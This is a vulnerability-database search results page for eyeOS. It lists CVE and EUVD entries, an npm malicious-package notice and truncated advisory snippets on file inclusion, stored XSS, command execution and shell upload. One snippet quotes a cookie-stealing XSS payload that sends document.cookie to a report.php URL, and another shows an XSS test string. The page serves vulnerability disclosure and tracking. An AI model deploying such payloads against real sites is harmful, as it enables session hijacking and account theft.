68 matches found
EUVD-2011-3695
Malware in sbrugna...
EUVD-2006-5056
Malware in sbrugna...
EUVD-2006-6539
Malware in sbrugna...
EUVD-2005-3412
Malware in sbrugna...
EUVD-2005-3413
Malware in sbrugna...
EUVD-2006-0643
Malware in sbrugna...
EUVD-2007-4591
Malware in sbrugna...
Malicious code in eyeos-extra (npm)
The package eyeos-extra was found to contain malicious code...
MAL-2025-20112 Malicious code in eyeos-extra (npm)
The package eyeos-extra was found to contain malicious code...
CVE-2011-3737
eyeOS 2.2.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by apps/rmail/webmail/program/lib/Net/SMTP.php and certain other files...
eyeos 2.3 - Multiple Vulnerabilities
No description provided by source. ------------------------------------------------------------------------ Software................eyeOS 2.3 Vulnerability...........Local File Inclusion Threat Level............Critical 4/5 Download................http://www.eyeos.org/ Discovery...
eyeos <= 1.9.0.2 - Stored XSS vulnerability using image files
No description provided by source. Title: eyeOS = 1.9.0.2 Stored XSS vulnerability using image files Product: eyeOS = 1.9.0.2 Author: Alberto Ortega @a0rtega albertoatpentboxdotnet http://securitybydefault.com/ - Summary: A stored XSS vulnerability using image files jpg, png, gif tested affects t...
EyeOS 0.8.x Session Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16537/info The eyeOS system is prone to a remote command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied data. An attacker can exploit this issue to execute...
eyeOS '.php' Files Information Disclosure Vulnerability
eyeOS is prone to an information disclosure vulnerability. SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
CVE-2011-3737
eyeOS 2.2.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by apps/rmail/webmail/program/lib/Net/SMTP.php and certain other files...
Information disclosure
eyeOS 2.2.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by apps/rmail/webmail/program/lib/Net/SMTP.php and certain other files...
CVE-2011-3737
eyeOS 2.2.0.0 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by apps/rmail/webmail/program/lib/Net/SMTP.php and certain other files...
eyeOS Shell Upload / Cross Site Scripting
A few weeks ago, an exploit for an increasingly more popular open source OS on http://www.exploit-db.com/exploits/17220/ was made public, it was titled 'eyeOS var http = new XMLHttpRequest var url = "http://localhost/report.php?" + "user=" + top.document.title + "&cookie=" + document.cookie;...
eyeOS <= 1.9.0.2 Stored XSS Vulnerability Using Image Files
Exploit for php platform in category web applications Title: eyeOS alert"XSS done"; - Risks and consequences: Malicious users can inject code inside image files malware, browser exploits, etc... to attack other users and compromise the whole system via shared files or internal messages. -...
eyeOS 1.9.0.2 Cross Site Scripting
Title: eyeOS alert"XSS done"; - Risks and consequences: Malicious users can inject code inside image files malware, browser exploits, etc... to attack other users and compromise the whole system via shared files or internal messages. - Mitigations: Disallow public dirs. Avoid work with images. -...